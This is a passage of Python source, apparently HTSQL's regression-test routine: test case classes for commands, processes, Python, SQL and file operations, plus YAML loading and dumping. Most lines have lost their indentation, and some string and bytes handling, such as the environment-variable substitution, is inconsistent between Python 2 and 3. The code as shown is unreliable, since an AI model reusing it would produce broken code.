stderr = stdout
stdin = TermStringIO(self.input.stdin, stdout)
command_line = [self.routine.executable]+self.input.ctl
# The script class.
ctl_class = self.routine.ctl.__class__
# Initialize and execute the script; check for exceptions.
try:
ctl = ctl_class(stdin, stdout, stderr)
exit = ctl.main(command_line)
except:
self.out_exception(sys.exc_info())
            return self.out("*** an exception occurred"
                            " while running the application")
# Normalize the exit code.
if exit is None:
exit = 0
elif not isinstance(exit, int):
stderr.write(str(exit))
exit = 1
# Generate a new output record.
new_output = self.make_output(ctl=self.input.ctl,
stdout=stdout.getvalue(),
exit=exit)
# Check if we get the expected exit code; if not, display
# the content of stdout and discard the output record.
if not self.input.ignore:
if new_output.exit != self.input.expect:
self.out_diff(self.output, new_output)
return self.out("*** unexpected exit code: %s" % exit)
return new_output
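# In YAML, a `ctl` test looks like (the routine arguments are
# illustrative):
#
#     - ctl: [version]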
class Fork(object):
"""
Keeps information on the started processes.
Class attributes:
`active_forks`
The global list of active processes.
`is_atexit_registered`
Indicates whether an :func:`atexit.atexit` callable was registered.
The callable is called when the script is about to finish and kills
any remaining active processes.
Attributes:
`process` (an instance of :class:`subprocess.Popen`)
The wrapped process.
`temp_path` (a string)
A directory containing two files: `input` and `output`, which
keeps the content of the standard input and the standard output
respectively.
"""
active_forks = []
is_atexit_registered = False
@classmethod
def start(cls, executable, arguments, input):
"""
Starts a new process.
`executable`
The path to the executable.
`arguments`
The list of arguments (not including the executable).
`input`
The content of the standard input.
Returns a new :class:`Fork` instance.
"""
# Create a temporary directory with the files 'input' and 'output'.
temp_path = tempfile.mkdtemp()
        stream = open("%s/input" % temp_path, 'wb')
        # The standard input is given as a string; encode it before
        # writing it to the binary stream.
        if isinstance(input, str):
            input = input.encode('utf-8')
        stream.write(input)
        stream.close()
# Prepare the standard input and the standard output streams.
stdin = open("%s/input" % temp_path, 'rb')
stdout = open("%s/output" % temp_path, 'wb')
# Start the process.
try:
process = subprocess.Popen([executable]+arguments,
stdin=stdin,
stdout=stdout,
stderr=subprocess.STDOUT)
except:
shutil.rmtree(temp_path)
raise
# Return a new `Fork` instance.
return cls(process, temp_path)
@classmethod
def atexit(cls):
# Finalize any remaining active processes.
for fork in cls.active_forks:
fork.end()
@classmethod
def atexit_register(cls):
# Register the `atexit` callable if not done already.
if not cls.is_atexit_registered:
atexit.register(cls.atexit)
cls.is_atexit_registered = True
def __init__(self, process, temp_path):
# Sanity check on the arguments.
assert isinstance(process, subprocess.Popen)
assert isinstance(temp_path, str) and os.path.isdir(temp_path)
self.process = process
self.temp_path = temp_path
# Save themselves in the global list of active processes.
self.active_forks.append(self)
# Register the `atexit` callback.
self.atexit_register()
def end(self):
"""
Ends the process.
Returns the content of the standard output.
"""
# Terminate the process if it is still alive.
if self.process.poll() is None:
self.process.terminate()
time.sleep(1.0)
# Read the standard output.
        stream = open("%s/output" % self.temp_path, 'rb')
        # Decode the captured output so that it can be compared with
        # the expected (string) test data.
        output = stream.read().decode('utf-8', errors='replace')
        stream.close()
# Remove the temporary directory.
shutil.rmtree(self.temp_path)
# Remove it from the list of active processes.
self.active_forks.remove(self)
return output
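# A minimal usage sketch of `Fork` (the executable and arguments are
# illustrative):
#
#     fork = Fork.start('htsql-ctl', ['serve', 'sqlite:test.db'], '')
#     ...                     # interact with the running process
#     output = fork.end()     # terminate it and collect its stdout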
class StartCtlTestCase(SkipTestCase):
"""
Starts a long-running routine.
"""
name = "start-ctl"
hint = """execute a long-running routine"""
help = """
    This test case starts a long-running HTSQL command-line
    application. Use the `end-ctl` test case to finalize the application
    and check the output.
"""
class Input(TestData):
fields = [
Field('start_ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('stdin', StrVal(), '',
hint="""the content of the standard output"""),
Field('sleep', UFloatVal(), 0,
hint="""sleep for the specified number of seconds"""),
] + SkipTestCase.Input.fields
def verify(self):
# Execute the test.
# Check if the test case is skipped.
if self.skipped():
return
# Check if an application with the same command-line parameters
# has already been started.
key = tuple(self.input.start_ctl)
if key in self.state.forks:
            return self.failed("*** the application is already started")
# Start and save the process.
fork = Fork.start(self.routine.executable,
self.input.start_ctl,
self.input.stdin)
        self.state.forks[key] = fork
        # Give the application some time to start up.
        time.sleep(self.input.sleep)
class EndCtlTestCase(RunAndCompareTestCase):
"""
Terminates a long-running routine.
"""
name = "end-ctl"
hint = """terminate a long-running routine"""
help = """
This test case allows you to terminate a long-running routine started
with `start-ctl`.
"""
class Input(TestData):
fields = [
Field('end_ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('ignore', BoolVal(), False,
hint="""ignore the exit code and the standard output"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('end_ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('stdout', StrVal(),
hint="""the standard output"""),
]
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
if not self.input.ignore:
if old_output.stdout != new_output.stdout:
return True
return False
def render(self, output):
# Convert the output record to a list of lines.
if output is None:
return None
return output.stdout.splitlines()
def execute(self):
# Execute the test case.
        # Find the active process with the same command-line arguments.
key = tuple(self.input.end_ctl)
if key not in self.state.forks:
return self.out("*** the application has not been started")
fork = self.state.forks.pop(key)
# Terminate the process; get the standard output.
stdout = fork.end()
# Create and return the output record.
new_output = self.make_output(end_ctl=self.input.end_ctl,
stdout=stdout)
return new_output
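# `start-ctl` and `end-ctl` records are paired by their command-line
# parameters, e.g. (the arguments are illustrative):
#
#     - start-ctl: [serve, sqlite:test.db]
#       sleep: 1
#     - end-ctl: [serve, sqlite:test.db]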
class PythonCodeTestCase(RunAndCompareTestCase):
"""
Executes arbitrary Python code.
"""
name = "python"
hint = """execute Python code"""
help = """
This test case allows you to execute arbitrary Python code.
"""
class Input(TestData):
fields = [
Field('py', WordVal(),
hint="""the code name"""),
Field('code', StrVal(),
hint="""Python code"""),
Field('stdin', StrVal(), '',
hint="""the content of the standard input"""),
Field('expect', StrVal(), None,
hint="""the name of an exception to expect"""),
Field('ignore', BoolVal(), False,
hint="""ignore the standard output"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('py', WordVal(),
hint="""the code name"""),
Field('stdout', StrVal(),
hint="""the content of the standard output"""),
]
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
if not self.input.ignore:
if old_output.stdout != new_output.stdout:
return True
return False
def render(self, output):
# Convert the output record to a list of lines.
if output is None:
return None
return output.stdout.splitlines()
def execute(self):
# Execute the test case.
# Prepare new standard streams.
old_stdin = sys.stdin
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdin = io.StringIO(self.input.stdin)
sys.stdout = io.StringIO()
sys.stderr = sys.stdout
# Prepare the code.
code = self.load()
context = {'state': self.state}
# Execute the code.
exc_info = None
try:
exec(code, context)
except:
exc_info = sys.exc_info()
# Make new output record.
key = self.input.fields[0].attribute
new_output = self.make_output(stdout=sys.stdout.getvalue(),
**{key: getattr(self.input, key)})
# Restore old standard streams.
sys.stdin = old_stdin
sys.stdout = old_stdout
sys.stderr = old_stderr
        # An exception occurred while running the code.
if exc_info is not None:
# Display the output and the exception
self.out_diff(self.output, new_output)
self.out_exception(exc_info)
exc_name = exc_info[0].__name__
# The exception was unexpected: discard the output.
if self.input.expect is None or self.input.expect != exc_name:
return self.out("*** an unexpected exception occured")
else:
# We didn't get the expected exception: discard the output.
if self.input.expect is not None:
return self.out("*** an expected exception did not occur")
return new_output
def load(self):
# Get the script source code.
return self.input.code
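# In YAML, a `python` test looks like (the snippet is illustrative):
#
#     - py: hello
#       code: |
#         print('hello, world')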
class PythonCodeIncludeTestCase(PythonCodeTestCase):
"""
Executes arbitrary Python code loaded from a file.
"""
name = "python-include"
hint = """load and execute Python code"""
help = """
This test case allows you to execute arbitrary Python code
loaded from a file.
"""
class Input(TestData):
fields = [
Field('py_include', StrVal(),
hint="""the file containing Python code"""),
Field('stdin', StrVal(), '',
hint="""the content of the standard input"""),
Field('expect', StrVal(), None,
hint="""the name of an exception to expect"""),
Field('ignore', BoolVal(), False,
hint="""ignore the standard output"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('py_include', StrVal(),
hint="""the file containing Python code"""),
Field('stdout', StrVal(),
hint="""the content of the standard output"""),
]
def load(self):
# Get the script code from the given file
stream = open(self.input.py_include, 'rb')
code = stream.read()
stream.close()
return code
class SQLTestCase(SkipTestCase):
"""
Executes a SQL query.
"""
name = "sql"
hint = """execute a SQL statement"""
help = """
This test case executes one or multiple SQL statements.
"""
class Input(TestData):
fields = [
Field('connect', DBVal(),
hint="""the connection URI"""),
Field('sql', StrVal(),
hint="""the statements to execute"""),
Field('autocommit', BoolVal(), False,
hint="""use the auto-commit mode"""),
Field('ignore', BoolVal(), False,
hint="""ignore any errors"""),
] + SkipTestCase.Input.fields
def out_header(self):
# Print:
# ---------------- ... -
# {first line of input.sql}
# ({input.location})
self.out_sep()
first_line = self.input.sql.split('\n', 1)[0]
self.out(first_line, indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Load the SQL input data.
sql = self.load()
# Generate an HTSQL application. We need an application instance
# to split the SQL data and to connect to the database, but we
# never use it for executing HTSQL queries.
from htsql import HTSQL
from htsql.core.error import Error
from htsql.core.connect import connect
from htsql.core.split_sql import split_sql
try:
app = HTSQL(self.input.connect)
except Exception as exc:
self.out_exception(sys.exc_info())
            return self.failed("*** an exception occurred while"
                               " initializing an HTSQL application")
# Activate the application so that we could use the splitter
# and the connection adapters.
with app:
# Realize a splitter and split the input data to individual
# SQL statements.
try:
statements = list(split_sql(sql))
except ValueError as exc:
return self.failed("*** invalid SQL: %s" % exc)
# Realize the connector and connect to the database.
try:
connection = connect(with_autocommit=self.input.autocommit)
cursor = connection.cursor()
except Error as exc:
return self.failed("*** failed to connect to the database:"
"\n%s" % exc)
# Execute the given SQL statements.
for statement in statements:
try:
# Execute the statement in the current connection.
cursor.execute(statement)
except Error as exc:
# Display the statement that caused a problem.
for line in statement.splitlines():
self.out(line, indent=4)
# Normally, we end the test case when an error occurs,
# but if `ignore` is set, we just break the loop.
if not self.input.ignore:
return self.failed("*** failed to execute SQL:"
"\n%s" % exc)
break
# No error occurred while executing the SQL statements.
else:
# Commit the transaction unless `autocommit` mode is set.
# Again, respect the `ignore` flag.
if not self.input.autocommit:
try:
connection.commit()
except Error as exc:
if not self.input.ignore:
return self.failed("*** failed to commit"
" a transaction:\n%s" % exc)
# Close the connection. Note that we insist that connection
# is opened and closed successfully regardless of the value
# of the `ignore` flag.
try:
connection.close()
except Error as exc:
return self.failed("*** failed to close the connection:"
"\n%s" % exc)
# If we reached that far, we passed the test.
return self.passed()
def load(self):
"""
Returns the SQL data to execute.
"""
# Override when subclassing.
return self.input.sql
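# In YAML, a `sql` test looks like (the URI and the statement are
# illustrative):
#
#     - connect: sqlite:test.db
#       sql: |
#         CREATE TABLE school (code TEXT, name TEXT);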
class SQLIncludeTestCase(SQLTestCase):
"""
Loads SQL queries from a file and executes them.
"""
name = "sql-include"
hint = """load and execute SQL statements"""
help = """
This test case loads SQL statements from a file and execute them.
"""
class Input(TestData):
fields = [
Field('connect', DBVal(),
hint="""the connection URI"""),
Field('sql_include', StrVal(),
hint="""the file containing SQL statements"""),
Field('autocommit', BoolVal(), False,
hint="""use the auto-commit mode"""),
Field('ignore', BoolVal(), False,
hint="""ignore any errors"""),
] + SkipTestCase.Input.fields
def out_header(self):
# Print:
# ---------------- ... -
# SQL-INCLUDE {input.sql_include}
# ({input.location})
self.out_sep()
self.out("%s %s" % (self.name.upper(), self.input.sql_include),
indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def load(self):
# Load SQL from the given file.
        stream = open(self.input.sql_include, 'rb')
        # The SQL splitter expects a string, so decode the file content.
        sql = stream.read().decode('utf-8')
        stream.close()
return sql
class WriteToFileTestCase(SkipTestCase):
"""
Writes some data to a file.
"""
name = "write-to-file"
hint = """write some data to a file"""
help = None
class Input(TestData):
fields = [
Field('write', StrVal(),
hint="""the file name"""),
Field('data', StrVal(),
hint="""the data to write"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Write the data to the file.
        stream = open(self.input.write, 'wb')
        # The field value is a string; encode it for the binary stream.
        stream.write(self.input.data.encode('utf-8'))
        stream.close()
class ReadFromFileTestCase(RunAndCompareTestCase):
"""
Reads the file content.
"""
name = "read-from-file"
hint = """read the content of a file"""
help = None
class Input(TestData):
fields = [
Field('read', StrVal(),
hint="""the file name"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('read', StrVal(),
hint="""the file name"""),
Field('data', StrVal(),
hint="""the content of the file"""),
]
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
return (old_output.data != new_output.data)
def render(self, output):
# Convert the output record to a list of lines.
if output is None:
return None
return output.data.splitlines()
def execute(self):
# Execute the test.
# Check if the file exists.
if not os.path.exists(self.input.read):
return self.out("*** file %r does not exist" % self.input.read)
# Read the data and create the output record.
        stream = open(self.input.read, 'rb')
        # Decode the content so that it can be compared with the
        # expected (string) test data.
        data = stream.read().decode('utf-8', errors='replace')
        stream.close()
new_output = self.make_output(read=self.input.read, data=data)
return new_output
class RemoveFilesTestCase(SkipTestCase):
"""
Removes the specified files.
"""
name = "remove-files"
hint = """remove the specified files"""
help = """
Remove a list of files. It is not an error if some of the files do not
exist.
"""
class Input(TestData):
fields = [
Field('remove', SeqVal(StrVal()),
hint="""a list of files to remove"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Remove the given files.
for path in self.input.remove:
if os.path.exists(path):
os.unlink(path)
class MakeDirTestCase(SkipTestCase):
"""
Creates a directory.
"""
name = "make-dir"
hint = """create a directory"""
help = """
Create a directory. If necessary, all intermediate directories are also
created.
"""
class Input(TestData):
fields = [
Field('mkdir', StrVal(),
hint="""the directory name"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Create the directory if it does not already exist.
if not os.path.isdir(self.input.mkdir):
os.makedirs(self.input.mkdir)
class RemoveDirTestCase(SkipTestCase):
"""
Removes a directory.
"""
name = "remove-dir"
hint = """remove a directory"""
help = """
Removes a directory with all its content. It is not an error if the
directory does not exist.
"""
class Input(TestData):
fields = [
Field('rmdir', StrVal(),
hint="""the directory name"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Remove the directory with all its content (DANGEROUS!).
if os.path.exists(self.input.rmdir):
shutil.rmtree(self.input.rmdir)
class TestState(object):
"""
Keeps the mutable state of the testing process.
`app`
The current HTSQL application.
`forks`
A mapping from command-line parameters to :class:`Fork`
instances; contains long-running applications.
`toggles`
A set of active named toggles.
`saves`
A mapping of named application configurations.
`with_all_suites`
Indicates that the current suite or one of its ancestors
was explicitly selected by the user.
`passed`
The current number of passed tests.
`failed`
The current number of failed tests.
`updated`
The current number of updated tests.
`is_exiting`
Indicates whether the user asked to halt the testing.
"""
def __init__(self, app=None, forks=None, toggles=None, saves=None,
with_all_suites=False, passed=0, failed=0, updated=0,
is_exiting=False):
self.app = app
self.forks = forks or {}
self.toggles = toggles or set()
self.saves = saves or {}
self.with_all_suites = with_all_suites
self.passed = passed
self.failed = failed
self.updated = updated
self.is_exiting = is_exiting
def push(self, other):
"""
Push the state data to a derived state.
`other` (:class:`TestState`)
A derived state, the state created by a suite for
the suite test cases.
"""
other.app = self.app
other.forks = self.forks.copy()
other.toggles = self.toggles.copy()
other.saves = self.saves.copy()
other.with_all_suites = self.with_all_suites
other.passed = self.passed
other.failed = self.failed
other.updated = self.updated
other.is_exiting = self.is_exiting
def pull(self, other):
"""
Pull the state from a derived state.
Note that only statistical information is pulled from
the derived state.
`other` (:class:`TestState`)
A derived state, the state created by a suite for
the suite test cases.
"""
self.passed = other.passed
self.failed = other.failed
self.updated = other.updated
self.is_exiting = other.is_exiting
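
# A minimal sketch of the intended push/pull flow (the suite wiring here is
# assumed; only the `TestState` calls are real):
#
#   parent = TestState()
#   child = TestState()
#   parent.push(child)    # copy configuration and counters down
#   ...                   # the suite runs its nested cases against `child`
#   parent.pull(child)    # pull the updated statistics back up
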
# The base classes for the YAML loaders and dumpers. When available, use
# the fast LibYAML-based variants; otherwise, fall back to the slower
# pure-Python versions.
BaseYAMLLoader = yaml.SafeLoader
if hasattr(yaml, 'CSafeLoader'):
BaseYAMLLoader = yaml.CSafeLoader
BaseYAMLDumper = yaml.SafeDumper
if hasattr(yaml, 'CSafeDumper'):
BaseYAMLDumper = yaml.CSafeDumper
class RegressYAMLLoader(BaseYAMLLoader):
"""
Loads test data from a YAML file.
`routine` (:class:`RegressRoutine`)
The testing engine.
`with_input` (Boolean)
Indicates that the YAML file contains input records.
`with_output` (Boolean)
Indicates that the YAML file contains output records.
`stream` (a file or a file-like object)
The YAML stream.
"""
# A pattern to match substitution variables in `!environ` nodes.
environ_pattern = r"""
\$ \{
(?P<name> [a-zA-Z_][0-9a-zA-Z_.-]*)
(?: : (?P<default> [0-9A-Za-z~@#^&*_;:,./?=+-]*) )?
\}
"""
environ_regexp = re.compile(environ_pattern, re.X)
# A pattern for valid values of substitution variables.
environ_value_pattern = r"""^ [0-9A-Za-z~@#^&*_;:,./?=+-]* $"""
environ_value_regexp = re.compile(environ_value_pattern, re.X)
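    # For example, the scalar `${PGHOST:localhost}` expands to the value of
    # the PGHOST environment variable, falling back to "localhost" when it
    # is unset (the variable name here is illustrative).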
def __init__(self, routine, with_input, with_output, stream):
super(RegressYAMLLoader, self).__init__(stream)
self.routine = routine
# The list of permitted record classes.
self.records = []
# A mapping of record_class -> case_class.
self.case_by_record = {}
# A mapping of record_class -> the set of all attributes.
self.all_keys_by_record = {}
# A mapping of record_class -> the set of mandatory attributes.
self.mandatory_keys_by_record = {}
# Generate a list of permitted record classes.
self.init_records(with_input, with_output)
def init_records(self, with_input, with_output):
# Gather the record classes from the available test cases.
for case_class in self.routine.cases:
if with_input and case_class.Input is not None:
self.records.append(case_class.Input)
self.case_by_record[case_class.Input] = case_class
if with_output and case_class.Output is not None:
self.records.append(case_class.Output)
self.case_by_record[case_class.Output] = case_class
# For each record class, prepare the set of all attributes and
# the set of mandatory attributes.
for record_class in self.records:
all_keys = set()
for field in record_class.fields:
if field.is_any:
all_keys = None
break
all_keys.add(field.attribute.replace('_', '-'))
self.all_keys_by_record[record_class] = all_keys
mandatory_keys = set()
for field in record_class.fields:
if field.is_any or not field.is_mandatory:
continue
mandatory_keys.add(field.attribute.replace('_', '-'))
if not mandatory_keys:
mandatory_keys = None
self.mandatory_keys_by_record[record_class] = mandatory_keys
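    # For instance, for the `remove-files` Input record above, `remove` is
    # the only mandatory key, so a mapping node containing a `remove` key is
    # recognized as a `remove-files` input record (assuming no earlier record
    # class in the list claims the same mandatory keys).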
def load(self):
"""
Loads test data from the YAML stream.
"""
        # `get_single_data()` ensures that the stream contains exactly one
        # document, parses it, and returns the corresponding object.
        return self.get_single_data()
def construct_document(self, node):
# We override this to ensure that any produced document is
        # a test record of the expected type.
data = super(RegressYAMLLoader, self).construct_document(node)
if type(data) not in self.records:
raise yaml.constructor.ConstructorError(None, None,
"unexpected document type",
node.start_mark)
return data
def construct_yaml_str(self, node):
        # Always convert a `!!str` scalar node to a byte string.
        # By default, PyYAML converts a `!!str` node containing non-ASCII
        # characters to a Unicode string.
value = self.construct_scalar(node)
value = value.encode('utf-8')
return value
def construct_yaml_map(self, node):
        # Detect if a node represents test data and convert it to a test record.
# We assume that the node represents a test record if it contains
# all mandatory keys of the record class. Otherwise, we assume it
# is a regular dictionary.
#
        # It would be much better to perform this detection during the tag
        # resolution phase. However, that phase does not give us access
        # to the mapping keys, so we have no choice but to do it during
        # the construction phase.
# Check if we got a mapping node.
if not isinstance(node, yaml.MappingNode):
raise yaml.constructor.ConstructorError(None, None,
"expected a mapping node, but found %s" % node.id,
node.start_mark)
# Objects corresponding to the key nodes.
keys = []
# Objects corresponding to the value nodes.
values = []
# The mapping of key object -> value object.
value_by_key = {}
# The mapping of key object -> the mark of the key node.
key_mark_by_key = {}
# The mapping of key object -> the mark of the value node.
value_mark_by_key = {}
# Convert the key and the value nodes.
for key_node, value_node in node.value:
key = self.construct_object(key_node, deep=True)
try:
hash(key)
except TypeError as exc:
raise yaml.constructor.ConstructorError(
"while constructing a mapping",
node.start_mark,
"found unacceptable key (%s)" % exc,
key_node.start_mark)
keys.append(key)
value = self.construct_object(value_node, deep=True)
values.append(value)
value_by_key[key] = value
key_mark_by_key[key] = key_node.start_mark
value_mark_by_key[key] = value_node.start_mark
# Find a record class such that the node contains all
# the mandatory record fields.
detected_record_class = None
key_set = set(keys)
for record_class in self.records:
mandatory_keys = self.mandatory_keys_by_record[record_class]
if mandatory_keys is None:
continue
if key_set.issuperset(mandatory_keys):
detected_record_class = record_class
break
# If we can't find a suitable record class, it must be a regular
# dictionary.
if detected_record_class is None:
            return dict(zip(keys, values))
# Check that the node does not contain any keys other than
# the record fields.
all_keys = self.all_keys_by_record[detected_record_class]
if all_keys is not None:
for key in keys:
if key not in all_keys:
raise yaml.constructor.ConstructorError(None, None,
"unexpected key %r; expected one of %s"
% (key, ", ".join(sorted(all_keys))),
key_mark_by_key[key])
# Generate the record attributes: validate and normalize
# the field values.
attributes = {}
for field in detected_record_class.fields:
if field.is_any:
continue
key = field.attribute.replace('_', '-')
if key in value_by_key:
value = value_by_key[key]
try:
value = field.val(value)
except ValueError as exc:
raise yaml.constructor.ConstructorError(None, None,
"invalid field %r (%s)" % (key, exc),
value_mark_by_key[key])
else:
value = field.default
attributes[field.attribute] = value
# Record where the node was found.
location = "\"%s\", line %s" \
% (node.start_mark.name, node.start_mark.line+1)
# Instantiate and return the test record.
case_class = self.case_by_record[detected_record_class]
try:
record = detected_record_class(self.routine, case_class,
attributes, location)
except ValueError as exc:
raise yaml.constructor.ConstructorError(None, None,
"invalid test data (%s)" % exc,
node.start_mark)
return record
def construct_environ(self, node):
# Substitute environment variables in `!environ` scalars.
def replace(match):
# Substitute environment variables with values.
name = match.group('name')
default = match.group('default') or ''
value = os.environ.get(name, default)
if not self.environ_value_regexp.match(value):
raise yaml.constructor.ConstructorError(None, None,
"invalid value of environment variable %s: %r"
% (name, value), node.start_mark)
return value
        # Get the scalar value and replace all ${...} occurrences with the
        # values of the respective environment variables.
value = self.construct_scalar(node)
value = value.encode('utf-8')
value = self.environ_regexp.sub(replace, value)
# Blank values are returned as `None`.
if not value:
return None
return value
# Register custom constructors for `!!str`, `!!map`, and `!environ`.
RegressYAMLLoader.add_constructor(
'tag:yaml.org,2002:str',
RegressYAMLLoader.construct_yaml_str)
RegressYAMLLoader.add_constructor(
'tag:yaml.org,2002:map',
RegressYAMLLoader.construct_yaml_map)
RegressYAMLLoader.add_constructor(
'!environ',
RegressYAMLLoader.construct_environ)
# Register a resolver for `!environ`.
RegressYAMLLoader.add_implicit_resolver(
'!environ', RegressYAMLLoader.environ_regexp, ['$'])
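
# Since the implicit resolver fires only on scalars that start with `$`, a
# value such as `${PGUSER:demo}` is substituted automatically, while a scalar
# with an embedded variable, e.g. `pgsql://${PGUSER:demo}@localhost/htsql`,
# needs an explicit `!environ` tag (the example values are invented).
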
class RegressYAMLDumper(BaseYAMLDumper):
"""
Dumps test data to a YAML file.
`routine` (:class:`RegressRoutine`)
The testing engine.
`with_input` (Boolean)
Indicates that the YAML file will contain input records.
`with_output` (Boolean)
Indicates that the YAML file will contain output records.
`stream` (a file or a file-like object)
The stream where the YAML document is written.
"""
def __init__(self, routine, with_input, with_output, stream, **keywords):
# FIXME: we don't really need extra `with_*` parameters, this
# constructor is always called with with_input=False, with_output=True.
super(RegressYAMLDumper, self).__init__(stream, **keywords)
self.routine = routine
# The set of permitted record classes.
self.records = set()
# Gather the permitted record classes.
self.init_records(with_input, with_output)
# Check if the PyYAML version is suitable for dumping.
self.check_version()
def init_records(self, with_input, with_output):
# Gather permitted record classes.
for case_class in self.routine.cases:
if with_input and case_class.Input is not None:
self.records.add(case_class.Input)
if with_output and case_class.Output is not None:
self.records.add(case_class.Output)
def check_version(self):
# We require PyYAML >= 3.07 built with LibYAML >= 0.1.2 to dump
# YAML data. Other versions may produce slightly different output.
        # Since the YAML files may be kept in a VCS repository, we don't
        # want minor formatting changes to generate unnecessarily large diffs.
try:
pyyaml_version = yaml.__version__
except AttributeError:
pyyaml_version = '3.05'
try:
import _yaml
libyaml_version = _yaml.get_version_string()
except ImportError:
libyaml_version = None
if pyyaml_version < '3.07':
raise ScriptError("PyYAML >= 3.07 is required"
" to dump test output")
if libyaml_version is None:
raise ScriptError("PyYAML built with LibYAML bindings"
" is required to dump test output")
if libyaml_version < '0.1.2':
raise ScriptError("LibYAML >= 0.1.2 is required"
" to dump test output")
def dump(self, data):
"""
Dumps the data to the YAML stream.
"""
self.open()
self.represent(data)
self.close()
def represent_str(self, data):
# Serialize a string. We override the default string serializer
# to use the literal block style for multi-line strings.
tag = None
style = None
if data.endswith('\n'):
style = '|'
tag = 'tag:yaml.org,2002:str'
return self.represent_scalar(tag, data, style=style)
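    # For example, a value of "SELECT 1\n" would be emitted in the literal
    # block style (the `sql` key is illustrative):
    #
    #   sql: |
    #     SELECT 1
    #
    # while values without a trailing newline keep the default scalar style.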
def represent_record(self, data):
# Complain when given a record of unexpected type.
if type(data) not in self.records:
return super(RegressYAMLDumper, self).represent_undefined(data)
        # Extract the fields, skipping those with the default value.
mapping = []
for field in data.fields:
if field.is_any:
continue
name = field.attribute.replace('_', '-')
value = getattr(data, field.attribute)
if value == field.default:
continue
mapping.append((name, value))
# Generate a mapping node.
return self.represent_mapping('tag:yaml.org,2002:map', mapping,
flow_style=False)
# Register custom representers for `str` and `TestData`.
RegressYAMLDumper.add_representer(
str, RegressYAMLDumper.represent_str)
RegressYAMLDumper.add_multi_representer(
TestData, RegressYAMLDumper.represent_record)
class RegressRoutine(Routine):
"""
Implements the `regress` routine.
"""
name = 'regress'
aliases = ['test']
arguments = [
Argument('suites', SeqVal(StrVal()), None, is_list=True),
]
options = [
InputOption,
TrainOption,
PurgeOption,
ForceOption,
QuietOption,
]
hint = """run regression tests"""
help = """
This routine runs a series of test cases.
A test case takes input data and produces output data. The test
succeeds if it runs without errors and its output data coincides with
the expected output.
Input and output test data are stored in the YAML format. Run
'%(executable)s help regress <case>' to get the description of the
format for a specific test type.
Test cases are organized into suites. A test suite is a special type of
a test case that contains other test cases.
By default, the routine executes all tests in the given YAML file. To
run only specific test suites, list their identifiers in the command
line.
Unless option `--force` is used, the testing process will halt on the
first test failure.
The routine reads the input data from the standard input stream. Use
option `--input FILE` to read the input data from a file instead.
    The routine supports a training mode, which allows you to add expected
    output for new tests and update expected output for existing tests.
    Use option `--train` to run the routine in the training mode.
When a test case is removed, the routine does not remove obsolete
expected output records automatically. Use option `--purge` to remove
stale output records.
    By default, the routine prints the header of every executed test. Use
option `--quiet` to print only errors and final statistics.
"""
# This text is written to YAML files generated by the routine.
output_help = """
#
# This file contains expected test output data for regression tests.
# It was generated automatically by the `regress` routine.
#
"""
# List of supported types of test cases.
cases = [
AppTestCase,
LoadAppTestCase,
DefineTestCase,
IncludeTestCase,
SuiteTestCase,
QueryTestCase,
CtlTestCase,
StartCtlTestCase,
EndCtlTestCase,
PythonCodeTestCase,
PythonCodeIncludeTestCase,
SQLTestCase,
SQLIncludeTestCase,
WriteToFileTestCase,
ReadFromFileTestCase,
RemoveFilesTestCase,
MakeDirTestCase,
RemoveDirTestCase,
]
# Represents the mutable state of the testing process.
state_class = TestState
@classmethod
def get_help(cls, **substitutes):
"""
Returns a long description of the routine.
"""
# Produce routine description of the form:
# {help}
#
# Test cases: (run ... for more help)
# {case.name} : {case.hint}
# ...
lines = []
help = super(RegressRoutine, cls).get_help(**substitutes)
if help is not None:
lines.append(help)
if cls.cases:
if lines:
lines.append("")
lines.append("Test cases:"
" (run '%(executable)s help regress <case>'"
" for more help)" % substitutes)
for case_class in cls.cases:
case_name = case_class.name
case_hint = case_class.get_hint()
if case_hint is not None:
lines.append(" %-24s : %s" % (case_name, case_hint))
else:
lines.append(" %s" % case_name)
return "\n".join(lines)
@classmethod
def get_feature(cls, name):
"""
Finds the test case by name.
"""
for case_class in cls.cases:
if case_class.name == name:
return case_class
raise ScriptError("unknown test case %r" % name)
def run(self):
# Get the test input data.
input = self.load_input(self.input)
# Initialize the testing state.
state = self.state_class()
# Create a test case.
case = input.case_class(self, state, input, None)
# Check if all test suites specified by the user exist.
if self.suites:
available_suites = case.get_suites()
for suite in self.suites:
if suite not in available_suites:
raise ScriptError("unknown suite %r" % suite)
# Start the testing in the selected mode.
if self.train:
case.train()
else:
case.verify()
# Display the statistics.
self.ctl.out("="*72)
if state.passed:
self.ctl.out("TESTS PASSED: %s" % state.passed)
if state.failed:
self.ctl.out("TESTS FAILED: %s" % state.failed)
if state.updated:
self.ctl.out("TESTS UPDATED: %s" % state.updated)
self.ctl.out()
# Produce a fatal error if at least one test failed.
if state.failed:
if state.failed == 1:
message = "a test failed"
else:
message = "%s tests failed" % state.failed
raise ScriptError(message)
def load_input(self, path):
# Load test input data from a file. If `path` is `None`,
# load from the standard input.
assert isinstance(path, maybe(str))
if path is not None:
stream = open(path, 'rb')
else:
stream = self.ctl.stdin
loader = RegressYAMLLoader(self, True, False, stream)
try:
input = loader.load()
except yaml.YAMLError as exc:
raise ScriptError("failed to load test input data: %s" % exc)
return input
